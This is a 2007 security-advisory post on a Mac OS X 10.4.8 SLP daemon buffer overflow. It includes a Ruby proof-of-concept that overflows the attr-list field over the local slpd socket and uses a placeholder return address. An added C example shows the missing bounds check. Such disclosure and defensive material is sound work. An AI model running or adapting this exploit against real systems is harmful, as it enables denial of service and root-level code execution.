[EXPL] Mac OS X SLP Daemon Service Registration Buffer Overflow (PoC)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 18 Jan 2007 16:34:26 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Mac OS X SLP Daemon Service Registration Buffer Overflow (PoC)
------------------------------------------------------------------------
SUMMARY
"The Service Location Protocol provides a scalable framework for the
discovery and selection of network services."
slpd is vulnerable to a buffer overflow when processing the attr-list
field of a registration request, leading to an exploitable denial of
service condition and potentially arbitrary code execution. This would
allow unprivileged local (and possibly remote) users to execute arbitrary
code with root privileges.
DETAILS
Vulnerable Systems:
* Mac OS X version 10.4.8.
Exploit:
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
# All pwnage reserved.
#
# Proof of concept for MOAB-17-01-2007
# http://projects.info-pull.com/moab/MOAB-17-01-2007.html
#
# Originally reported to Apple by Kevin, on 08/02/2006.
require 'socket'
target_path = (ARGV[0] || '/var/run/slp_ipc')
slp_socket = UNIXSocket.open(target_path)
payload = ("\x58" * 506)
payload << [0xdeadbeef].pack("V") # ...it expects a valid mem. address (ex. 0xbffff398)
stream = "\x01" +                        # SrvRqst = 1
         "\x00\x13" +                    # Length of remaining fields? (up to attr-list)
         "\x04\x00\x00\x00\x00\x00\x00" +
         "\x00\x02\x00\x00" +            # length of scope-list string
         "\x78\x78" +                    # <scope-list>
         "\xff\x03\x00\x00" +            # length of attr-list string 0x3ff = 1023 in hex.
         (payload)                       # <attr-list>
slp_socket.write stream
slp_socket.close
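The defect described in the summary and driven by the PoC above is a parser that trusts the attr-list length field. The following is an added example, not code from the advisory, the PoC or Apple's slpd, of the bounds check such a parser needs: each length-prefixed field is refused if its declared length exceeds either the bytes actually received or the destination buffer. The field layout (1-byte function id, 2-byte length, 7 header bytes, then 4-byte little-endian length-prefixed scope-list and attr-list) follows the PoC's own comments; the buffer sizes and the function names are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Destination buffer sizes are assumed for illustration; the advisory does
 * not state the sizes slpd actually uses. */
#define MAX_SCOPE_LIST 256
#define MAX_ATTR_LIST  512

/* Header as laid out in the PoC: function id (1), length (2), 7 more bytes. */
#define HDR_LEN 10

struct slp_reg {
    char scope_list[MAX_SCOPE_LIST + 1];
    char attr_list[MAX_ATTR_LIST + 1];
};

static uint32_t le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Copy one 4-byte-length-prefixed field into dst. Rejects (returns 0) when
 * the declared length is larger than the bytes still available in the
 * message or larger than the destination buffer; otherwise returns the
 * number of message bytes consumed. */
static size_t take_field(const uint8_t *p, size_t avail, char *dst, size_t cap) {
    if (avail < 4) return 0;
    uint32_t len = le32(p);
    if (len > avail - 4 || len > cap) return 0;   /* the check the overflow lacks */
    memcpy(dst, p + 4, len);
    dst[len] = '\0';
    return 4 + (size_t)len;
}

/* Parse a registration message of n bytes. Returns 1 if both fields fit and
 * the message has no trailing garbage, 0 if it was rejected. */
int parse_slp_reg(const uint8_t *msg, size_t n, struct slp_reg *out) {
    if (n < HDR_LEN) return 0;
    size_t off = HDR_LEN;
    size_t used = take_field(msg + off, n - off, out->scope_list, MAX_SCOPE_LIST);
    if (!used) return 0;
    off += used;
    used = take_field(msg + off, n - off, out->attr_list, MAX_ATTR_LIST);
    if (!used) return 0;
    return off + used == n;
}
```

A message whose attr-list length claims 0x3ff bytes while only a handful follow is rejected before any copy takes place.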
ADDITIONAL INFORMATION
The original article can be found at:
<http://www.milw0rm.com/exploits/3151>